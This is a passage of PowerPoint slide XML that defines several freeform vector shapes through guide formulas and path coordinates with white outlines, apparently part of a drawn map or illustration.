                  <a:gd name="T4" fmla="*/ 16 w 53"/>
                  <a:gd name="T5" fmla="*/ 57 h 65"/>
                  <a:gd name="T6" fmla="*/ 8 w 53"/>
                  <a:gd name="T7" fmla="*/ 40 h 65"/>
                  <a:gd name="T8" fmla="*/ 0 w 53"/>
                  <a:gd name="T9" fmla="*/ 13 h 65"/>
                  <a:gd name="T10" fmla="*/ 0 w 53"/>
                  <a:gd name="T11" fmla="*/ 5 h 65"/>
                  <a:gd name="T12" fmla="*/ 2 w 53"/>
                  <a:gd name="T13" fmla="*/ 2 h 65"/>
                  <a:gd name="T14" fmla="*/ 18 w 53"/>
                  <a:gd name="T15" fmla="*/ 0 h 65"/>
                  <a:gd name="T16" fmla="*/ 31 w 53"/>
                  <a:gd name="T17" fmla="*/ 11 h 65"/>
                  <a:gd name="T18" fmla="*/ 53 w 53"/>
                  <a:gd name="T19" fmla="*/ 31 h 65"/>
                  <a:gd name="T20" fmla="*/ 53 w 53"/>
                  <a:gd name="T21" fmla="*/ 43 h 65"/>
                  <a:gd name="T22" fmla="*/ 51 w 53"/>
                  <a:gd name="T23" fmla="*/ 55 h 65"/>
                  <a:gd name="T24" fmla="*/ 48 w 53"/>
                  <a:gd name="T25" fmla="*/ 56 h 65"/>
                  <a:gd name="T26" fmla="*/ 37 w 53"/>
                  <a:gd name="T27" fmla="*/ 62 h 65"/>
                  <a:gd name="T28" fmla="*/ 29 w 53"/>
                  <a:gd name="T29" fmla="*/ 65 h 6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53"/>
                  <a:gd name="T46" fmla="*/ 0 h 65"/>
                  <a:gd name="T47" fmla="*/ 53 w 53"/>
                  <a:gd name="T48" fmla="*/ 65 h 6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53" h="65">
                    <a:moveTo>
                      <a:pt x="29" y="65"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="21" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="65"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36231" name="Freeform 364"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1065" y="780"/>
                <a:ext cx="102" cy="135"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 92 w 102"/>
                  <a:gd name="T1" fmla="*/ 135 h 135"/>
                  <a:gd name="T2" fmla="*/ 84 w 102"/>
                  <a:gd name="T3" fmla="*/ 133 h 135"/>
                  <a:gd name="T4" fmla="*/ 80 w 102"/>
                  <a:gd name="T5" fmla="*/ 127 h 135"/>
                  <a:gd name="T6" fmla="*/ 73 w 102"/>
                  <a:gd name="T7" fmla="*/ 105 h 135"/>
                  <a:gd name="T8" fmla="*/ 69 w 102"/>
                  <a:gd name="T9" fmla="*/ 98 h 135"/>
                  <a:gd name="T10" fmla="*/ 47 w 102"/>
                  <a:gd name="T11" fmla="*/ 95 h 135"/>
                  <a:gd name="T12" fmla="*/ 36 w 102"/>
                  <a:gd name="T13" fmla="*/ 98 h 135"/>
                  <a:gd name="T14" fmla="*/ 32 w 102"/>
                  <a:gd name="T15" fmla="*/ 98 h 135"/>
                  <a:gd name="T16" fmla="*/ 21 w 102"/>
                  <a:gd name="T17" fmla="*/ 96 h 135"/>
                  <a:gd name="T18" fmla="*/ 16 w 102"/>
                  <a:gd name="T19" fmla="*/ 90 h 135"/>
                  <a:gd name="T20" fmla="*/ 8 w 102"/>
                  <a:gd name="T21" fmla="*/ 77 h 135"/>
                  <a:gd name="T22" fmla="*/ 7 w 102"/>
                  <a:gd name="T23" fmla="*/ 69 h 135"/>
                  <a:gd name="T24" fmla="*/ 10 w 102"/>
                  <a:gd name="T25" fmla="*/ 64 h 135"/>
                  <a:gd name="T26" fmla="*/ 16 w 102"/>
                  <a:gd name="T27" fmla="*/ 64 h 135"/>
                  <a:gd name="T28" fmla="*/ 28 w 102"/>
                  <a:gd name="T29" fmla="*/ 72 h 135"/>
                  <a:gd name="T30" fmla="*/ 34 w 102"/>
                  <a:gd name="T31" fmla="*/ 71 h 135"/>
                  <a:gd name="T32" fmla="*/ 34 w 102"/>
                  <a:gd name="T33" fmla="*/ 63 h 135"/>
                  <a:gd name="T34" fmla="*/ 32 w 102"/>
                  <a:gd name="T35" fmla="*/ 53 h 135"/>
                  <a:gd name="T36" fmla="*/ 22 w 102"/>
                  <a:gd name="T37" fmla="*/ 34 h 135"/>
                  <a:gd name="T38" fmla="*/ 18 w 102"/>
                  <a:gd name="T39" fmla="*/ 31 h 135"/>
                  <a:gd name="T40" fmla="*/ 10 w 102"/>
                  <a:gd name="T41" fmla="*/ 28 h 135"/>
                  <a:gd name="T42" fmla="*/ 0 w 102"/>
                  <a:gd name="T43" fmla="*/ 20 h 135"/>
                  <a:gd name="T44" fmla="*/ 1 w 102"/>
                  <a:gd name="T45" fmla="*/ 5 h 135"/>
                  <a:gd name="T46" fmla="*/ 17 w 102"/>
                  <a:gd name="T47" fmla="*/ 0 h 135"/>
                  <a:gd name="T48" fmla="*/ 34 w 102"/>
                  <a:gd name="T49" fmla="*/ 6 h 135"/>
                  <a:gd name="T50" fmla="*/ 40 w 102"/>
                  <a:gd name="T51" fmla="*/ 21 h 135"/>
                  <a:gd name="T52" fmla="*/ 47 w 102"/>
                  <a:gd name="T53" fmla="*/ 38 h 135"/>
                  <a:gd name="T54" fmla="*/ 61 w 102"/>
                  <a:gd name="T55" fmla="*/ 45 h 135"/>
                  <a:gd name="T56" fmla="*/ 76 w 102"/>
                  <a:gd name="T57" fmla="*/ 49 h 135"/>
                  <a:gd name="T58" fmla="*/ 85 w 102"/>
                  <a:gd name="T59" fmla="*/ 58 h 135"/>
                  <a:gd name="T60" fmla="*/ 89 w 102"/>
                  <a:gd name="T61" fmla="*/ 67 h 135"/>
                  <a:gd name="T62" fmla="*/ 97 w 102"/>
                  <a:gd name="T63" fmla="*/ 93 h 135"/>
                  <a:gd name="T64" fmla="*/ 101 w 102"/>
                  <a:gd name="T65" fmla="*/ 109 h 135"/>
                  <a:gd name="T66" fmla="*/ 102 w 102"/>
                  <a:gd name="T67" fmla="*/ 123 h 135"/>
                  <a:gd name="T68" fmla="*/ 99 w 102"/>
                  <a:gd name="T69" fmla="*/ 130 h 135"/>
                  <a:gd name="T70" fmla="*/ 92 w 102"/>
                  <a:gd name="T71" fmla="*/ 135 h 135"/>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02"/>
                  <a:gd name="T109" fmla="*/ 0 h 135"/>
                  <a:gd name="T110" fmla="*/ 102 w 102"/>
                  <a:gd name="T111" fmla="*/ 135 h 135"/>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02" h="135">
                    <a:moveTo>
                      <a:pt x="92" y="135"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="84" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="135"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36232" name="Freeform 365"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1206" y="590"/>
                <a:ext cx="180" cy="289"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 108 w 180"/>
                  <a:gd name="T1" fmla="*/ 76 h 289"/>
                  <a:gd name="T2" fmla="*/ 117 w 180"/>
                  <a:gd name="T3" fmla="*/ 106 h 289"/>
                  <a:gd name="T4" fmla="*/ 123 w 180"/>
                  <a:gd name="T5" fmla="*/ 129 h 289"/>
                  <a:gd name="T6" fmla="*/ 131 w 180"/>
                  <a:gd name="T7" fmla="*/ 121 h 289"/>
                  <a:gd name="T8" fmla="*/ 134 w 180"/>
                  <a:gd name="T9" fmla="*/ 99 h 289"/>
                  <a:gd name="T10" fmla="*/ 145 w 180"/>
                  <a:gd name="T11" fmla="*/ 121 h 289"/>
                  <a:gd name="T12" fmla="*/ 147 w 180"/>
                  <a:gd name="T13" fmla="*/ 141 h 289"/>
                  <a:gd name="T14" fmla="*/ 153 w 180"/>
                  <a:gd name="T15" fmla="*/ 192 h 289"/>
                  <a:gd name="T16" fmla="*/ 168 w 180"/>
                  <a:gd name="T17" fmla="*/ 188 h 289"/>
                  <a:gd name="T18" fmla="*/ 172 w 180"/>
                  <a:gd name="T19" fmla="*/ 197 h 289"/>
                  <a:gd name="T20" fmla="*/ 150 w 180"/>
                  <a:gd name="T21" fmla="*/ 219 h 289"/>
                  <a:gd name="T22" fmla="*/ 142 w 180"/>
                  <a:gd name="T23" fmla="*/ 240 h 289"/>
                  <a:gd name="T24" fmla="*/ 137 w 180"/>
                  <a:gd name="T25" fmla="*/ 253 h 289"/>
                  <a:gd name="T26" fmla="*/ 122 w 180"/>
                  <a:gd name="T27" fmla="*/ 250 h 289"/>
                  <a:gd name="T28" fmla="*/ 125 w 180"/>
                  <a:gd name="T29" fmla="*/ 274 h 289"/>
                  <a:gd name="T30" fmla="*/ 119 w 180"/>
                  <a:gd name="T31" fmla="*/ 282 h 289"/>
                  <a:gd name="T32" fmla="*/ 104 w 180"/>
                  <a:gd name="T33" fmla="*/ 260 h 289"/>
                  <a:gd name="T34" fmla="*/ 102 w 180"/>
                  <a:gd name="T35" fmla="*/ 285 h 289"/>
                  <a:gd name="T36" fmla="*/ 95 w 180"/>
                  <a:gd name="T37" fmla="*/ 289 h 289"/>
                  <a:gd name="T38" fmla="*/ 72 w 180"/>
                  <a:gd name="T39" fmla="*/ 280 h 289"/>
                  <a:gd name="T40" fmla="*/ 62 w 180"/>
                  <a:gd name="T41" fmla="*/ 275 h 289"/>
                  <a:gd name="T42" fmla="*/ 38 w 180"/>
                  <a:gd name="T43" fmla="*/ 217 h 289"/>
                  <a:gd name="T44" fmla="*/ 76 w 180"/>
                  <a:gd name="T45" fmla="*/ 211 h 289"/>
                  <a:gd name="T46" fmla="*/ 94 w 180"/>
                  <a:gd name="T47" fmla="*/ 219 h 289"/>
                  <a:gd name="T48" fmla="*/ 55 w 180"/>
                  <a:gd name="T49" fmla="*/ 184 h 289"/>
                  <a:gd name="T50" fmla="*/ 36 w 180"/>
                  <a:gd name="T51" fmla="*/ 188 h 289"/>
                  <a:gd name="T52" fmla="*/ 25 w 180"/>
                  <a:gd name="T53" fmla="*/ 196 h 289"/>
                  <a:gd name="T54" fmla="*/ 13 w 180"/>
                  <a:gd name="T55" fmla="*/ 168 h 289"/>
                  <a:gd name="T56" fmla="*/ 0 w 180"/>
                  <a:gd name="T57" fmla="*/ 134 h 289"/>
                  <a:gd name="T58" fmla="*/ 31 w 180"/>
                  <a:gd name="T59" fmla="*/ 131 h 289"/>
                  <a:gd name="T60" fmla="*/ 16 w 180"/>
                  <a:gd name="T61" fmla="*/ 106 h 289"/>
                  <a:gd name="T62" fmla="*/ 24 w 180"/>
                  <a:gd name="T63" fmla="*/ 87 h 289"/>
                  <a:gd name="T64" fmla="*/ 36 w 180"/>
                  <a:gd name="T65" fmla="*/ 88 h 289"/>
                  <a:gd name="T66" fmla="*/ 25 w 180"/>
                  <a:gd name="T67" fmla="*/ 43 h 289"/>
                  <a:gd name="T68" fmla="*/ 41 w 180"/>
                  <a:gd name="T69" fmla="*/ 29 h 289"/>
                  <a:gd name="T70" fmla="*/ 53 w 180"/>
                  <a:gd name="T71" fmla="*/ 31 h 289"/>
                  <a:gd name="T72" fmla="*/ 51 w 180"/>
                  <a:gd name="T73" fmla="*/ 0 h 289"/>
                  <a:gd name="T74" fmla="*/ 67 w 180"/>
                  <a:gd name="T75" fmla="*/ 10 h 289"/>
                  <a:gd name="T76" fmla="*/ 84 w 180"/>
                  <a:gd name="T77" fmla="*/ 59 h 289"/>
                  <a:gd name="T78" fmla="*/ 94 w 180"/>
                  <a:gd name="T79" fmla="*/ 82 h 289"/>
                  <a:gd name="T80" fmla="*/ 102 w 180"/>
                  <a:gd name="T81" fmla="*/ 80 h 289"/>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80"/>
                  <a:gd name="T124" fmla="*/ 0 h 289"/>
                  <a:gd name="T125" fmla="*/ 180 w 180"/>
                  <a:gd name="T126" fmla="*/ 289 h 289"/>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80" h="289">
                    <a:moveTo>
                      <a:pt x="102" y="80"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="108" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="80"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36233" name="Freeform 366"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1292" y="384"/>
                <a:ext cx="466" cy="640"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 466"/>
                  <a:gd name="T1" fmla="*/ 147 h 640"/>
                  <a:gd name="T2" fmla="*/ 59 w 466"/>
                  <a:gd name="T3" fmla="*/ 128 h 640"/>
                  <a:gd name="T4" fmla="*/ 99 w 466"/>
                  <a:gd name="T5" fmla="*/ 100 h 640"/>
                  <a:gd name="T6" fmla="*/ 166 w 466"/>
                  <a:gd name="T7" fmla="*/ 140 h 640"/>
                  <a:gd name="T8" fmla="*/ 152 w 466"/>
                  <a:gd name="T9" fmla="*/ 76 h 640"/>
                  <a:gd name="T10" fmla="*/ 198 w 466"/>
                  <a:gd name="T11" fmla="*/ 22 h 640"/>
                  <a:gd name="T12" fmla="*/ 242 w 466"/>
                  <a:gd name="T13" fmla="*/ 84 h 640"/>
                  <a:gd name="T14" fmla="*/ 245 w 466"/>
                  <a:gd name="T15" fmla="*/ 10 h 640"/>
                  <a:gd name="T16" fmla="*/ 285 w 466"/>
                  <a:gd name="T17" fmla="*/ 41 h 640"/>
                  <a:gd name="T18" fmla="*/ 318 w 466"/>
                  <a:gd name="T19" fmla="*/ 47 h 640"/>
                  <a:gd name="T20" fmla="*/ 353 w 466"/>
                  <a:gd name="T21" fmla="*/ 22 h 640"/>
                  <a:gd name="T22" fmla="*/ 420 w 466"/>
                  <a:gd name="T23" fmla="*/ 45 h 640"/>
                  <a:gd name="T24" fmla="*/ 457 w 466"/>
                  <a:gd name="T25" fmla="*/ 69 h 640"/>
                  <a:gd name="T26" fmla="*/ 433 w 466"/>
                  <a:gd name="T27" fmla="*/ 143 h 640"/>
                  <a:gd name="T28" fmla="*/ 375 w 466"/>
                  <a:gd name="T29" fmla="*/ 149 h 640"/>
                  <a:gd name="T30" fmla="*/ 401 w 466"/>
                  <a:gd name="T31" fmla="*/ 176 h 640"/>
                  <a:gd name="T32" fmla="*/ 392 w 466"/>
                  <a:gd name="T33" fmla="*/ 221 h 640"/>
                  <a:gd name="T34" fmla="*/ 344 w 466"/>
                  <a:gd name="T35" fmla="*/ 297 h 640"/>
                  <a:gd name="T36" fmla="*/ 308 w 466"/>
                  <a:gd name="T37" fmla="*/ 361 h 640"/>
                  <a:gd name="T38" fmla="*/ 283 w 466"/>
                  <a:gd name="T39" fmla="*/ 386 h 640"/>
                  <a:gd name="T40" fmla="*/ 236 w 466"/>
                  <a:gd name="T41" fmla="*/ 383 h 640"/>
                  <a:gd name="T42" fmla="*/ 254 w 466"/>
                  <a:gd name="T43" fmla="*/ 419 h 640"/>
                  <a:gd name="T44" fmla="*/ 245 w 466"/>
                  <a:gd name="T45" fmla="*/ 487 h 640"/>
                  <a:gd name="T46" fmla="*/ 239 w 466"/>
                  <a:gd name="T47" fmla="*/ 509 h 640"/>
                  <a:gd name="T48" fmla="*/ 204 w 466"/>
                  <a:gd name="T49" fmla="*/ 512 h 640"/>
                  <a:gd name="T50" fmla="*/ 185 w 466"/>
                  <a:gd name="T51" fmla="*/ 558 h 640"/>
                  <a:gd name="T52" fmla="*/ 152 w 466"/>
                  <a:gd name="T53" fmla="*/ 569 h 640"/>
                  <a:gd name="T54" fmla="*/ 207 w 466"/>
                  <a:gd name="T55" fmla="*/ 585 h 640"/>
                  <a:gd name="T56" fmla="*/ 180 w 466"/>
                  <a:gd name="T57" fmla="*/ 631 h 640"/>
                  <a:gd name="T58" fmla="*/ 152 w 466"/>
                  <a:gd name="T59" fmla="*/ 614 h 640"/>
                  <a:gd name="T60" fmla="*/ 129 w 466"/>
                  <a:gd name="T61" fmla="*/ 624 h 640"/>
                  <a:gd name="T62" fmla="*/ 105 w 466"/>
                  <a:gd name="T63" fmla="*/ 620 h 640"/>
                  <a:gd name="T64" fmla="*/ 62 w 466"/>
                  <a:gd name="T65" fmla="*/ 622 h 640"/>
                  <a:gd name="T66" fmla="*/ 28 w 466"/>
                  <a:gd name="T67" fmla="*/ 615 h 640"/>
                  <a:gd name="T68" fmla="*/ 53 w 466"/>
                  <a:gd name="T69" fmla="*/ 573 h 640"/>
                  <a:gd name="T70" fmla="*/ 50 w 466"/>
                  <a:gd name="T71" fmla="*/ 528 h 640"/>
                  <a:gd name="T72" fmla="*/ 90 w 466"/>
                  <a:gd name="T73" fmla="*/ 553 h 640"/>
                  <a:gd name="T74" fmla="*/ 126 w 466"/>
                  <a:gd name="T75" fmla="*/ 553 h 640"/>
                  <a:gd name="T76" fmla="*/ 101 w 466"/>
                  <a:gd name="T77" fmla="*/ 503 h 640"/>
                  <a:gd name="T78" fmla="*/ 69 w 466"/>
                  <a:gd name="T79" fmla="*/ 469 h 640"/>
                  <a:gd name="T80" fmla="*/ 117 w 466"/>
                  <a:gd name="T81" fmla="*/ 447 h 640"/>
                  <a:gd name="T82" fmla="*/ 128 w 466"/>
                  <a:gd name="T83" fmla="*/ 426 h 640"/>
                  <a:gd name="T84" fmla="*/ 77 w 466"/>
                  <a:gd name="T85" fmla="*/ 327 h 640"/>
                  <a:gd name="T86" fmla="*/ 132 w 466"/>
                  <a:gd name="T87" fmla="*/ 345 h 640"/>
                  <a:gd name="T88" fmla="*/ 142 w 466"/>
                  <a:gd name="T89" fmla="*/ 344 h 640"/>
                  <a:gd name="T90" fmla="*/ 199 w 466"/>
                  <a:gd name="T91" fmla="*/ 284 h 640"/>
                  <a:gd name="T92" fmla="*/ 176 w 466"/>
                  <a:gd name="T93" fmla="*/ 250 h 640"/>
                  <a:gd name="T94" fmla="*/ 134 w 466"/>
                  <a:gd name="T95" fmla="*/ 282 h 640"/>
                  <a:gd name="T96" fmla="*/ 90 w 466"/>
                  <a:gd name="T97" fmla="*/ 290 h 640"/>
